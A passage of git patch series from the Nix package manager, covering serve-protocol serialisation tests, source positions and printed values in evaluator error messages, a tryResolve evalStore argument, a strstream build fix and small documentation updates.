inline std::ostream & operator << (std::ostream & s, ServeProto::Command op) template<> DECLARE_SERVE_SERIALISER(BuildResult); +template<> +DECLARE_SERVE_SERIALISER(UnkeyedValidPathInfo); template DECLARE_SERVE_SERIALISER(std::vector); diff --git a/src/nix-store/nix-store.cc b/src/nix-store/nix-store.cc index db45be2a8..45af7879c 100644 --- a/src/nix-store/nix-store.cc +++ b/src/nix-store/nix-store.cc @@ -891,16 +891,8 @@ static void opServe(Strings opFlags, Strings opArgs) for (auto & i : paths) { try { auto info = store->queryPathInfo(i); - out << 
store->printStorePath(info->path) - << (info->deriver ? store->printStorePath(*info->deriver) : ""); - ServeProto::write(*store, wconn, info->references); - // !!! Maybe we want compression? - out << info->narSize // downloadSize - << info->narSize; - if (GET_PROTOCOL_MINOR(clientVersion) >= 4) - out << info->narHash.to_string(HashFormat::Nix32, true) - << renderContentAddress(info->ca) - << info->sigs; + out << store->printStorePath(info->path); + ServeProto::write(*store, wconn, static_cast(*info)); } catch (InvalidPath &) { } } diff --git a/tests/unit/libstore/data/serve-protocol/unkeyed-valid-path-info-2.3.bin b/tests/unit/libstore/data/serve-protocol/unkeyed-valid-path-info-2.3.bin new file mode 100644 index 0000000000000000000000000000000000000000..8056ec055ed2039814ab2654aad984f07115518f GIT binary patch literal 184 zcmZQzKm~Rk5I&4HhDz(_Wmf1Hm*f|v>Zco)n`cxS7viFIlM;*cQi{sJIvJt*ahg+E XS&435ArJt~*Gcp=fmdD+P%du3+9=$K@X zTQa|lwn`cL3n8wg;O8!IE8WDiY-4aNzU{MP{{~7(rMCb8 literal 0 HcmV?d00001 diff --git a/tests/unit/libstore/serve-protocol.cc b/tests/unit/libstore/serve-protocol.cc index 6d2054f7d..c2298c6db 100644 --- a/tests/unit/libstore/serve-protocol.cc +++ b/tests/unit/libstore/serve-protocol.cc @@ -225,6 +225,83 @@ VERSIONED_CHARACTERIZATION_TEST( t; })) +VERSIONED_CHARACTERIZATION_TEST( + ServeProtoTest, + unkeyedValidPathInfo_2_3, + "unkeyed-valid-path-info-2.3", + 2 << 8 | 3, + (std::tuple { + ({ + UnkeyedValidPathInfo info { Hash::dummy }; + info.narSize = 34878; + info; + }), + ({ + UnkeyedValidPathInfo info { Hash::dummy }; + info.deriver = StorePath { + "g1w7hy3qg1w7hy3qg1w7hy3qg1w7hy3q-bar.drv", + }; + info.references = { + StorePath { + "g1w7hyyyy1w7hy3qg1w7hy3qgqqqqy3q-foo.drv", + }, + }; + info.narSize = 34878; + info; + }), + })) + +VERSIONED_CHARACTERIZATION_TEST( + ServeProtoTest, + unkeyedValidPathInfo_2_4, + "unkeyed-valid-path-info-2.4", + 2 << 8 | 4, + (std::tuple { + ({ + UnkeyedValidPathInfo info { + 
Hash::parseSRI("sha256-FePFYIlMuycIXPZbWi7LGEiMmZSX9FMbaQenWBzm1Sc="), + }; + info.deriver = StorePath { + "g1w7hy3qg1w7hy3qg1w7hy3qg1w7hy3q-bar.drv", + }; + info.references = { + StorePath { + "g1w7hyyyy1w7hy3qg1w7hy3qgqqqqy3q-foo.drv", + }, + }; + info.narSize = 34878; + info; + }), + ({ + ValidPathInfo info { + *LibStoreTest::store, + "foo", + FixedOutputInfo { + .method = FileIngestionMethod::Recursive, + .hash = hashString(HashAlgorithm::SHA256, "(...)"), + .references = { + .others = { + StorePath { + "g1w7hy3qg1w7hy3qg1w7hy3qg1w7hy3q-bar", + }, + }, + .self = true, + }, + }, + Hash::parseSRI("sha256-FePFYIlMuycIXPZbWi7LGEiMmZSX9FMbaQenWBzm1Sc="), + }; + info.deriver = StorePath { + "g1w7hy3qg1w7hy3qg1w7hy3qg1w7hy3q-bar.drv", + }; + info.narSize = 34878; + info.sigs = { + "fake-sig-1", + "fake-sig-2", + }, + static_cast(std::move(info)); + }), + })) + VERSIONED_CHARACTERIZATION_TEST( ServeProtoTest, vector, From 0b80935c22f367b1deecffeddb97c90d7ed985e9 Mon Sep 17 00:00:00 2001 From: Rebecca Turner Date: Thu, 7 Dec 2023 10:01:42 -0800 Subject: [PATCH 070/654] Pass positions when evaluating MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit This includes position information in more places, making debugging easier. 
Before: ``` $ nix-instantiate --show-trace --eval tests/functional/lang/eval-fail-using-set-as-attr-name.nix error: … while evaluating an attribute name at «none»:0: (source not available) error: value is a set while a string was expected ``` After: ``` error: … while evaluating an attribute name at /pwd/lang/eval-fail-using-set-as-attr-name.nix:5:10: 4| in 5| attr.${key} | ^ 6| error: value is a set while a string was expected ``` --- .../rl-next/source-positions-in-errors.md | 45 +++++++++++++++++++ src/libexpr/eval-inline.hh | 12 ++--- src/libexpr/eval.cc | 18 ++++---- src/libexpr/nixexpr.hh | 1 + .../lang/eval-fail-attr-name-type.err.exp | 20 +++++++++ .../lang/eval-fail-attr-name-type.nix | 7 +++ .../lang/eval-fail-call-primop.err.exp | 12 +++++ .../functional/lang/eval-fail-call-primop.nix | 1 + .../lang/eval-fail-not-throws.err.exp | 18 ++++++++ .../functional/lang/eval-fail-not-throws.nix | 1 + .../eval-fail-using-set-as-attr-name.err.exp | 11 +++++ .../lang/eval-fail-using-set-as-attr-name.nix | 5 +++ 12 files changed, 137 insertions(+), 14 deletions(-) create mode 100644 doc/manual/rl-next/source-positions-in-errors.md create mode 100644 tests/functional/lang/eval-fail-attr-name-type.err.exp create mode 100644 tests/functional/lang/eval-fail-attr-name-type.nix create mode 100644 tests/functional/lang/eval-fail-call-primop.err.exp create mode 100644 tests/functional/lang/eval-fail-call-primop.nix create mode 100644 tests/functional/lang/eval-fail-not-throws.err.exp create mode 100644 tests/functional/lang/eval-fail-not-throws.nix create mode 100644 tests/functional/lang/eval-fail-using-set-as-attr-name.err.exp create mode 100644 tests/functional/lang/eval-fail-using-set-as-attr-name.nix diff --git a/doc/manual/rl-next/source-positions-in-errors.md b/doc/manual/rl-next/source-positions-in-errors.md new file mode 100644 index 000000000..00f0b27e8 --- /dev/null +++ b/doc/manual/rl-next/source-positions-in-errors.md @@ -0,0 +1,45 @@ +synopsis: Source locations 
are printed more consistently in errors +issues: #561 +prs: #9555 +description: { + +Source location information is now included in error messages more +consistently. Given this code: + +```nix +let + attr = {foo = "bar";}; + key = {}; +in + attr.${key} +``` + +Previously, Nix would show this unhelpful message when attempting to evaluate +it: + +``` +error: + … while evaluating an attribute name + + at «none»:0: (source not available) + + error: value is a set while a string was expected +``` + +Now, the error message displays where the problematic value was found: + +``` +error: + … while evaluating an attribute name + + at bad.nix:4:11: + + 3| key = {}; + 4| in attr.${key} + | ^ + 5| + + error: value is a set while a string was expected +``` + +} diff --git a/src/libexpr/eval-inline.hh b/src/libexpr/eval-inline.hh index a988fa40c..c37b1d62b 100644 --- a/src/libexpr/eval-inline.hh +++ b/src/libexpr/eval-inline.hh @@ -103,8 +103,10 @@ void EvalState::forceValue(Value & v, Callable getPos) throw; } } - else if (v.isApp()) - callFunction(*v.app.left, *v.app.right, v, noPos); + else if (v.isApp()) { + PosIdx pos = getPos(); + callFunction(*v.app.left, *v.app.right, v, pos); + } else if (v.isBlackhole()) error("infinite recursion encountered").atPos(getPos()).template debugThrow(); } @@ -121,9 +123,9 @@ template [[gnu::always_inline]] inline void EvalState::forceAttrs(Value & v, Callable getPos, std::string_view errorCtx) { - forceValue(v, noPos); + PosIdx pos = getPos(); + forceValue(v, pos); if (v.type() != nAttrs) { - PosIdx pos = getPos(); error("value is %1% while a set was expected", showType(v)).withTrace(pos, errorCtx).debugThrow(); } } @@ -132,7 +134,7 @@ inline void EvalState::forceAttrs(Value & v, Callable getPos, std::string_view e [[gnu::always_inline]] inline void EvalState::forceList(Value & v, const PosIdx pos, std::string_view errorCtx) { - forceValue(v, noPos); + forceValue(v, pos); if (!v.isList()) { error("value is %1% while a list was expected", 
showType(v)).withTrace(pos, errorCtx).debugThrow(); } diff --git a/src/libexpr/eval.cc b/src/libexpr/eval.cc index 7e68e6f9b..8a6e07fb0 100644 --- a/src/libexpr/eval.cc +++ b/src/libexpr/eval.cc @@ -344,7 +344,7 @@ static Symbol getName(const AttrName & name, EvalState & state, Env & env) } else { Value nameValue; name.expr->eval(state, env, nameValue); - state.forceStringNoCtx(nameValue, noPos, "while evaluating an attribute name"); + state.forceStringNoCtx(nameValue, name.expr->getPos(), "while evaluating an attribute name"); return state.symbols.create(nameValue.string_view()); } } @@ -1514,7 +1514,7 @@ void ExprOpHasAttr::eval(EvalState & state, Env & env, Value & v) e->eval(state, env, vTmp); for (auto & i : attrPath) { - state.forceValue(*vAttrs, noPos); + state.forceValue(*vAttrs, getPos()); Bindings::iterator j; auto name = getName(i, state, env); if (vAttrs->type() != nAttrs || @@ -1683,7 +1683,7 @@ void EvalState::callFunction(Value & fun, size_t nrArgs, Value * * args, Value & if (countCalls) primOpCalls[name]++; try { - vCur.primOp->fun(*this, noPos, args, vCur); + vCur.primOp->fun(*this, vCur.determinePos(noPos), args, vCur); } catch (Error & e) { addErrorTrace(e, pos, "while calling the '%1%' builtin", name); throw; @@ -1731,7 +1731,7 @@ void EvalState::callFunction(Value & fun, size_t nrArgs, Value * * args, Value & // 1. Unify this and above code. Heavily redundant. // 2. Create a fake env (arg1, arg2, etc.) and a fake expr (arg1: arg2: etc: builtins.name arg1 arg2 etc) // so the debugger allows to inspect the wrong parameters passed to the builtin. 
- primOp->primOp->fun(*this, noPos, vArgs, vCur); + primOp->primOp->fun(*this, vCur.determinePos(noPos), vArgs, vCur); } catch (Error & e) { addErrorTrace(e, pos, "while calling the '%1%' builtin", name); throw; @@ -1839,7 +1839,7 @@ https://nixos.org/manual/nix/stable/language/constructs.html#functions.)", symbo } } - callFunction(fun, allocValue()->mkAttrs(attrs), res, noPos); + callFunction(fun, allocValue()->mkAttrs(attrs), res, pos); } @@ -1875,7 +1875,7 @@ void ExprAssert::eval(EvalState & state, Env & env, Value & v) void ExprOpNot::eval(EvalState & state, Env & env, Value & v) { - v.mkBool(!state.evalBool(env, e, noPos, "in the argument of the not operator")); // XXX: FIXME: ! + v.mkBool(!state.evalBool(env, e, getPos(), "in the argument of the not operator")); // XXX: FIXME: ! } @@ -2316,7 +2316,7 @@ BackedStringView EvalState::coerceToString( std::string result; for (auto [n, v2] : enumerate(v.listItems())) { try { - result += *coerceToString(noPos, *v2, context, + result += *coerceToString(pos, *v2, context, "while evaluating one element of the list", coerceMore, copyToStore, canonicalizePath); } catch (Error & e) { @@ -2463,8 +2463,8 @@ SingleDerivedPath EvalState::coerceToSingleDerivedPath(const PosIdx pos, Value & bool EvalState::eqValues(Value & v1, Value & v2, const PosIdx pos, std::string_view errorCtx) { - forceValue(v1, noPos); - forceValue(v2, noPos); + forceValue(v1, pos); + forceValue(v2, pos); /* !!! Hack to support some old broken code that relies on pointer equality tests between sets. 
(Specifically, builderDefs calls diff --git a/src/libexpr/nixexpr.hh b/src/libexpr/nixexpr.hh index 10099d49e..020286815 100644 --- a/src/libexpr/nixexpr.hh +++ b/src/libexpr/nixexpr.hh @@ -405,6 +405,7 @@ struct ExprOpNot : Expr { Expr * e; ExprOpNot(Expr * e) : e(e) { }; + PosIdx getPos() const override { return e->getPos(); } COMMON_METHODS }; diff --git a/tests/functional/lang/eval-fail-attr-name-type.err.exp b/tests/functional/lang/eval-fail-attr-name-type.err.exp new file mode 100644 index 000000000..5f9a073dd --- /dev/null +++ b/tests/functional/lang/eval-fail-attr-name-type.err.exp @@ -0,0 +1,20 @@ +error: + … while evaluating the attribute 'puppy."${key}"' + + at /pwd/lang/eval-fail-attr-name-type.nix:3:5: + + 2| attrs = { + 3| puppy.doggy = {}; + | ^ + 4| }; + + … while evaluating an attribute name + + at /pwd/lang/eval-fail-attr-name-type.nix:7:17: + + 6| in + 7| attrs.puppy.${key} + | ^ + 8| + + error: value is an integer while a string was expected diff --git a/tests/functional/lang/eval-fail-attr-name-type.nix b/tests/functional/lang/eval-fail-attr-name-type.nix new file mode 100644 index 000000000..a0e76004a --- /dev/null +++ b/tests/functional/lang/eval-fail-attr-name-type.nix @@ -0,0 +1,7 @@ +let + attrs = { + puppy.doggy = {}; + }; + key = 1; +in + attrs.puppy.${key} diff --git a/tests/functional/lang/eval-fail-call-primop.err.exp b/tests/functional/lang/eval-fail-call-primop.err.exp new file mode 100644 index 000000000..19b407c47 --- /dev/null +++ b/tests/functional/lang/eval-fail-call-primop.err.exp @@ -0,0 +1,12 @@ +error: + … while calling the 'length' builtin + + at /pwd/lang/eval-fail-call-primop.nix:1:1: + + 1| builtins.length 1 + | ^ + 2| + + … while evaluating the first argument passed to builtins.length + + error: value is an integer while a list was expected diff --git a/tests/functional/lang/eval-fail-call-primop.nix b/tests/functional/lang/eval-fail-call-primop.nix new file mode 100644 index 000000000..972eb72c7 --- /dev/null +++ 
b/tests/functional/lang/eval-fail-call-primop.nix @@ -0,0 +1 @@ +builtins.length 1 diff --git a/tests/functional/lang/eval-fail-not-throws.err.exp b/tests/functional/lang/eval-fail-not-throws.err.exp new file mode 100644 index 000000000..b290afb0a --- /dev/null +++ b/tests/functional/lang/eval-fail-not-throws.err.exp @@ -0,0 +1,18 @@ +error: + … in the argument of the not operator + + at /pwd/lang/eval-fail-not-throws.nix:1:4: + + 1| ! (throw "uh oh!") + | ^ + 2| + + … while calling the 'throw' builtin + + at /pwd/lang/eval-fail-not-throws.nix:1:4: + + 1| ! (throw "uh oh!") + | ^ + 2| + + error: uh oh! diff --git a/tests/functional/lang/eval-fail-not-throws.nix b/tests/functional/lang/eval-fail-not-throws.nix new file mode 100644 index 000000000..a74ce4ebe --- /dev/null +++ b/tests/functional/lang/eval-fail-not-throws.nix @@ -0,0 +1 @@ +! (throw "uh oh!") diff --git a/tests/functional/lang/eval-fail-using-set-as-attr-name.err.exp b/tests/functional/lang/eval-fail-using-set-as-attr-name.err.exp new file mode 100644 index 000000000..811d01b03 --- /dev/null +++ b/tests/functional/lang/eval-fail-using-set-as-attr-name.err.exp @@ -0,0 +1,11 @@ +error: + … while evaluating an attribute name + + at /pwd/lang/eval-fail-using-set-as-attr-name.nix:5:10: + + 4| in + 5| attr.${key} + | ^ + 6| + + error: value is a set while a string was expected diff --git a/tests/functional/lang/eval-fail-using-set-as-attr-name.nix b/tests/functional/lang/eval-fail-using-set-as-attr-name.nix new file mode 100644 index 000000000..48e071a41 --- /dev/null +++ b/tests/functional/lang/eval-fail-using-set-as-attr-name.nix @@ -0,0 +1,5 @@ +let + attr = {foo = "bar";}; + key = {}; +in + attr.${key} From 96dd757b0c0f3d6702f8e38467a8bf467b43154e Mon Sep 17 00:00:00 2001 From: John Ericson Date: Fri, 8 Dec 2023 00:44:55 -0500 Subject: [PATCH 071/654] Give `Derivation::tryResolve` an `evalStore` argument This is needed for building CA derivations with a src store / dest store split.
In particular it is needed for Hydra. https://github.com/NixOS/hydra/issues/838 currently puts realizations, and thus build outputs, in the local store, but it should not. --- src/libstore/build/derivation-goal.cc | 2 +- src/libstore/derivations.cc | 4 ++-- src/libstore/derivations.hh | 2 +- 3 files changed, 4 insertions(+), 4 deletions(-) diff --git a/src/libstore/build/derivation-goal.cc b/src/libstore/build/derivation-goal.cc index 81eef7c47..d4da374ba 100644 --- a/src/libstore/build/derivation-goal.cc +++ b/src/libstore/build/derivation-goal.cc @@ -558,7 +558,7 @@ void DerivationGoal::inputsRealised() inputDrvOutputs statefully, sometimes it gets out of sync with the real source of truth (store). So we query the store directly if there's a problem. */ - attempt = fullDrv.tryResolve(worker.store); + attempt = fullDrv.tryResolve(worker.store, &worker.evalStore); } assert(attempt); Derivation drvResolved { std::move(*attempt) }; diff --git a/src/libstore/derivations.cc b/src/libstore/derivations.cc index 664ab7556..c35150b57 100644 --- a/src/libstore/derivations.cc +++ b/src/libstore/derivations.cc @@ -1002,13 +1002,13 @@ static void rewriteDerivation(Store & store, BasicDerivation & drv, const String } -std::optional Derivation::tryResolve(Store & store) const +std::optional Derivation::tryResolve(Store & store, Store * evalStore) const { std::map, StorePath> inputDrvOutputs; std::function::ChildNode &)> accum; accum = [&](auto & inputDrv, auto & node) { - for (auto & [outputName, outputPath] : store.queryPartialDerivationOutputMap(inputDrv)) { + for (auto & [outputName, outputPath] : store.queryPartialDerivationOutputMap(inputDrv, evalStore)) { if (outputPath) { inputDrvOutputs.insert_or_assign({inputDrv, outputName}, *outputPath); if (auto p = get(node.childMap, outputName)) diff --git a/src/libstore/derivations.hh b/src/libstore/derivations.hh index 290abedcf..2a326b578 100644 --- a/src/libstore/derivations.hh +++ b/src/libstore/derivations.hh @@ -342,7 +342,7 
@@ struct Derivation : BasicDerivation * 2. Input placeholders are replaced with realized input store * paths. */ - std::optional tryResolve(Store & store) const; + std::optional tryResolve(Store & store, Store * evalStore = nullptr) const; /** * Like the above, but instead of querying the Nix database for From f0ac2a35d5e9dfb3a53e6cc810e871fe119cbf4b Mon Sep 17 00:00:00 2001 From: Rebecca Turner Date: Fri, 8 Dec 2023 11:36:57 -0500 Subject: [PATCH 072/654] Print the value in `error: cannot coerce` messages (#9553) * Print the value in `error: cannot coerce` messages This extends the `error: cannot coerce a TYPE to a string` message to print the value that could not be coerced. This helps with debugging by making it easier to track down where the value is being produced from, especially in errors with deep or unhelpful stack traces. Co-authored-by: Valentin Gagarin --- .../rl-next/print-value-in-coercion-error.md | 50 +++++++++++++++++++ .../src/language/string-interpolation.md | 2 +- src/libexpr/eval.cc | 10 ++-- ...al-fail-bad-string-interpolation-1.err.exp | 2 +- ...al-fail-bad-string-interpolation-3.err.exp | 2 +- tests/unit/libexpr/error_traces.cc | 28 +++++------ 6 files changed, 73 insertions(+), 21 deletions(-) create mode 100644 doc/manual/rl-next/print-value-in-coercion-error.md diff --git a/doc/manual/rl-next/print-value-in-coercion-error.md b/doc/manual/rl-next/print-value-in-coercion-error.md new file mode 100644 index 000000000..504ea67b9 --- /dev/null +++ b/doc/manual/rl-next/print-value-in-coercion-error.md @@ -0,0 +1,50 @@ +synopsis: Coercion errors include the failing value +issues: #561 +prs: #9553 +description: { + +The `error: cannot coerce a to a string` message now includes the value which caused the error. 
+ +Previously, a failed string coercion produced a confusing error message if the trace didn't show where the offending value was defined: + +```bash +$ nix-instantiate --eval --expr ' +let x = { a = 1; }; in + +"${x}" +' +error: + … while evaluating a path segment + + at «string»:4:2: + + 3| + 4| "${x}" + | ^ + 5| + + error: cannot coerce a set to a string +``` + +Now, the error message includes the value itself: + +```bash +$ nix-instantiate --eval --expr ' +let x = { a = 1; }; in + +"${x}" +' +error: + … while evaluating a path segment + + at «string»:4:2: + + 3| + 4| "${x}" + | ^ + 5| + + error: cannot coerce a set to a string: { a = 1; } +``` + +} diff --git a/doc/manual/src/language/string-interpolation.md b/doc/manual/src/language/string-interpolation.md index e999b287b..6e28d2664 100644 --- a/doc/manual/src/language/string-interpolation.md +++ b/doc/manual/src/language/string-interpolation.md @@ -189,7 +189,7 @@ If neither is present, an error is thrown. > "${a}" > ``` > -> error: cannot coerce a set to a string +> error: cannot coerce a set to a string: { } > > at «string»:4:2: > diff --git a/src/libexpr/eval.cc b/src/libexpr/eval.cc index 7e68e6f9b..b52274b64 100644 --- a/src/libexpr/eval.cc +++ b/src/libexpr/eval.cc @@ -26,9 +26,9 @@ #include #include #include -#include #include #include +#include #include #include @@ -2286,7 +2286,7 @@ BackedStringView EvalState::coerceToString( return std::move(*maybeString); auto i = v.attrs->find(sOutPath); if (i == v.attrs->end()) { - error("cannot coerce %1% to a string", showType(v)) + error("cannot coerce %1% to a string: %2%", showType(v), printValue(*this, v)) .withTrace(pos, errorCtx) .debugThrow(); } @@ -2332,7 +2332,7 @@ BackedStringView EvalState::coerceToString( } } - error("cannot coerce %1% to a string", showType(v)) + error("cannot coerce %1% to a string: %2%", showType(v), printValue(*this, v)) .withTrace(pos, errorCtx) .debugThrow(); } @@ -2691,8 +2691,10 @@ void EvalState::printStatistics() 
std::string ExternalValueBase::coerceToString(const Pos & pos, NixStringContext & context, bool copyMore, bool copyToStore) const { + std::strstream printed; + print(printed); throw TypeError({ - .msg = hintfmt("cannot coerce %1% to a string", showType()) + .msg = hintfmt("cannot coerce %1% to a string: %2%", showType(), printed.str()) }); } diff --git a/tests/functional/lang/eval-fail-bad-string-interpolation-1.err.exp b/tests/functional/lang/eval-fail-bad-string-interpolation-1.err.exp index eb73e9a52..e54ecc6d1 100644 --- a/tests/functional/lang/eval-fail-bad-string-interpolation-1.err.exp +++ b/tests/functional/lang/eval-fail-bad-string-interpolation-1.err.exp @@ -7,4 +7,4 @@ error: | ^ 2| - error: cannot coerce a function to a string + error: cannot coerce a function to a string: diff --git a/tests/functional/lang/eval-fail-bad-string-interpolation-3.err.exp b/tests/functional/lang/eval-fail-bad-string-interpolation-3.err.exp index ac14f329b..6f0a96f78 100644 --- a/tests/functional/lang/eval-fail-bad-string-interpolation-3.err.exp +++ b/tests/functional/lang/eval-fail-bad-string-interpolation-3.err.exp @@ -7,4 +7,4 @@ error: | ^ 2| - error: cannot coerce a function to a string + error: cannot coerce a function to a string: diff --git a/tests/unit/libexpr/error_traces.cc b/tests/unit/libexpr/error_traces.cc index 81498f65a..c2403bee9 100644 --- a/tests/unit/libexpr/error_traces.cc +++ b/tests/unit/libexpr/error_traces.cc @@ -295,7 +295,7 @@ namespace nix { TEST_F(ErrorTraceTest, toPath) { ASSERT_TRACE2("toPath []", TypeError, - hintfmt("cannot coerce %s to a string", "a list"), + hintfmt("cannot coerce %s to a string: %s", "a list", "[ ]"), hintfmt("while evaluating the first argument passed to builtins.toPath")); ASSERT_TRACE2("toPath \"foo\"", @@ -309,7 +309,7 @@ namespace nix { TEST_F(ErrorTraceTest, storePath) { ASSERT_TRACE2("storePath true", TypeError, - hintfmt("cannot coerce %s to a string", "a Boolean"), + hintfmt("cannot coerce %s to a string: %s", "a 
Boolean", "true"), hintfmt("while evaluating the first argument passed to 'builtins.storePath'")); } @@ -318,7 +318,7 @@ namespace nix { TEST_F(ErrorTraceTest, pathExists) { ASSERT_TRACE2("pathExists []", TypeError, - hintfmt("cannot coerce %s to a string", "a list"), + hintfmt("cannot coerce %s to a string: %s", "a list", "[ ]"), hintfmt("while realising the context of a path")); ASSERT_TRACE2("pathExists \"zorglub\"", @@ -332,7 +332,7 @@ namespace nix { TEST_F(ErrorTraceTest, baseNameOf) { ASSERT_TRACE2("baseNameOf []", TypeError, - hintfmt("cannot coerce %s to a string", "a list"), + hintfmt("cannot coerce %s to a string: %s", "a list", "[ ]"), hintfmt("while evaluating the first argument passed to builtins.baseNameOf")); } @@ -377,7 +377,7 @@ namespace nix { TEST_F(ErrorTraceTest, filterSource) { ASSERT_TRACE2("filterSource [] []", TypeError, - hintfmt("cannot coerce %s to a string", "a list"), + hintfmt("cannot coerce %s to a string: %s", "a list", "[ ]"), hintfmt("while evaluating the second argument (the path to filter) passed to 'builtins.filterSource'")); ASSERT_TRACE2("filterSource [] \"foo\"", @@ -1038,7 +1038,7 @@ namespace nix { TEST_F(ErrorTraceTest, toString) { ASSERT_TRACE2("toString { a = 1; }", TypeError, - hintfmt("cannot coerce %s to a string", "a set"), + hintfmt("cannot coerce %s to a string: %s", "a set", "{ a = 1; }"), hintfmt("while evaluating the first argument passed to builtins.toString")); } @@ -1057,7 +1057,7 @@ namespace nix { ASSERT_TRACE2("substring 0 3 {}", TypeError, - hintfmt("cannot coerce %s to a string", "a set"), + hintfmt("cannot coerce %s to a string: %s", "a set", "{ }"), hintfmt("while evaluating the third argument (the string) passed to builtins.substring")); ASSERT_TRACE1("substring (-3) 3 \"sometext\"", @@ -1070,7 +1070,7 @@ namespace nix { TEST_F(ErrorTraceTest, stringLength) { ASSERT_TRACE2("stringLength {} # TODO: context is missing ???", TypeError, - hintfmt("cannot coerce %s to a string", "a set"), + 
hintfmt("cannot coerce %s to a string: %s", "a set", "{ }"), hintfmt("while evaluating the argument passed to builtins.stringLength")); } @@ -1143,7 +1143,7 @@ namespace nix { ASSERT_TRACE2("concatStringsSep \"foo\" [ 1 2 {} ] # TODO: coerce to string is buggy", TypeError, - hintfmt("cannot coerce %s to a string", "an integer"), + hintfmt("cannot coerce %s to a string: %s", "an integer", "1"), hintfmt("while evaluating one element of the list of strings to concat passed to builtins.concatStringsSep")); } @@ -1229,12 +1229,12 @@ namespace nix { ASSERT_TRACE2("derivationStrict { name = \"foo\"; builder = 1; system = {}; }", TypeError, - hintfmt("cannot coerce %s to a string", "a set"), + hintfmt("cannot coerce %s to a string: %s", "a set", "{ }"), hintfmt("while evaluating the attribute 'system' of derivation 'foo'")); ASSERT_TRACE2("derivationStrict { name = \"foo\"; builder = 1; system = 1; outputs = {}; }", TypeError, - hintfmt("cannot coerce %s to a string", "a set"), + hintfmt("cannot coerce %s to a string: %s", "a set", "{ }"), hintfmt("while evaluating the attribute 'outputs' of derivation 'foo'")); ASSERT_TRACE2("derivationStrict { name = \"foo\"; builder = 1; system = 1; outputs = \"drv\"; }", @@ -1279,17 +1279,17 @@ namespace nix { ASSERT_TRACE2("derivationStrict { name = \"foo\"; builder = 1; system = 1; outputs = \"out\"; args = [ {} ]; }", TypeError, - hintfmt("cannot coerce %s to a string", "a set"), + hintfmt("cannot coerce %s to a string: %s", "a set", "{ }"), hintfmt("while evaluating an element of the argument list")); ASSERT_TRACE2("derivationStrict { name = \"foo\"; builder = 1; system = 1; outputs = \"out\"; args = [ \"a\" {} ]; }", TypeError, - hintfmt("cannot coerce %s to a string", "a set"), + hintfmt("cannot coerce %s to a string: %s", "a set", "{ }"), hintfmt("while evaluating an element of the argument list")); ASSERT_TRACE2("derivationStrict { name = \"foo\"; builder = 1; system = 1; outputs = \"out\"; FOO = {}; }", TypeError, - 
hintfmt("cannot coerce %s to a string", "a set"), + hintfmt("cannot coerce %s to a string: %s", "a set", "{ }"), hintfmt("while evaluating the attribute 'FOO' of derivation 'foo'")); } From f9ee1bedcf98334d8bc015c2e04e30fbba958a3e Mon Sep 17 00:00:00 2001 From: John Ericson Date: Fri, 8 Dec 2023 13:18:52 -0500 Subject: [PATCH 073/654] Avoid `std::strstream`, fix the clang build According https://en.cppreference.com/w/cpp/io/strstream, it has been deprecated since C++98! The Clang + Linux build systems to not have it at all, or at least be hiding it. We can just use `std::stringstream` instead, I think. --- src/libexpr/eval.cc | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/src/libexpr/eval.cc b/src/libexpr/eval.cc index b52274b64..5d627224f 100644 --- a/src/libexpr/eval.cc +++ b/src/libexpr/eval.cc @@ -28,7 +28,7 @@ #include #include #include -#include +#include #include #include @@ -2691,7 +2691,7 @@ void EvalState::printStatistics() std::string ExternalValueBase::coerceToString(const Pos & pos, NixStringContext & context, bool copyMore, bool copyToStore) const { - std::strstream printed; + std::stringstream printed; print(printed); throw TypeError({ .msg = hintfmt("cannot coerce %1% to a string: %2%", showType(), printed.str()) From 005eaa1bd6c6090d5a55a062f429e6464345c6df Mon Sep 17 00:00:00 2001 From: Robert Hensing Date: Fri, 1 Dec 2023 16:40:54 +0100 Subject: [PATCH 074/654] doc/prerequisites-source: Add bdwgc-traceable-allocator patch --- doc/manual/src/installation/prerequisites-source.md | 8 ++++++-- 1 file changed, 6 insertions(+), 2 deletions(-) diff --git a/doc/manual/src/installation/prerequisites-source.md b/doc/manual/src/installation/prerequisites-source.md index d4babf1ea..907d7f63f 100644 --- a/doc/manual/src/installation/prerequisites-source.md +++ b/doc/manual/src/installation/prerequisites-source.md @@ -32,11 +32,15 @@ your distribution does not provide it, please install it from . 
- - The [Boehm garbage collector](http://www.hboehm.info/gc/) to reduce - the evaluator’s memory consumption (optional). To enable it, install + - The [Boehm garbage collector (`bdw-gc`)](http://www.hboehm.info/gc/) to reduce + the evaluator’s memory consumption (optional). + + To enable it, install `pkgconfig` and the Boehm garbage collector, and pass the flag `--enable-gc` to `configure`. + For `bdw-gc` <= 8.2.4 Nix needs a [small patch](https://github.com/NixOS/nix/blob/ac4d2e7b857acdfeac35ac8a592bdecee2d29838/boehmgc-traceable_allocator-public.diff) to be applied. + - The `boost` library of version 1.66.0 or higher. It can be obtained from the official web site . From ce4ca574d24abe233b717babc679e4c9228ba94b Mon Sep 17 00:00:00 2001 From: John Ericson Date: Mon, 6 Nov 2023 09:04:50 -0500 Subject: [PATCH 075/654] Clarify `SourceAccessor` methods should never implicitly follow symlinks The code has already been fixed (yay!) so what is left of this commit is just updating the API docs. Co-authored-by: Cole Helbling --- src/libutil/source-accessor.hh | 15 ++++++++++++++- 1 file changed, 14 insertions(+), 1 deletion(-) diff --git a/src/libutil/source-accessor.hh b/src/libutil/source-accessor.hh index 3ca12d624..4f4ff09c1 100644 --- a/src/libutil/source-accessor.hh +++ b/src/libutil/source-accessor.hh @@ -26,6 +26,13 @@ struct SourceAccessor /** * Return the contents of a file as a string. + * + * @note Unlike Unix, this method should *not* follow symlinks. Nix + * by default wants to manipulate symlinks explicitly, and not + * implicitly follow them, as they are frequently untrusted user data + * and thus may point to arbitrary locations. Acting on the targets + * of symlinks should only occasionally be done, and only + * with care. */ virtual std::string readFile(const CanonPath & path); @@ -34,7 +41,10 @@ * called with the size of the file before any data is written to * the sink. 
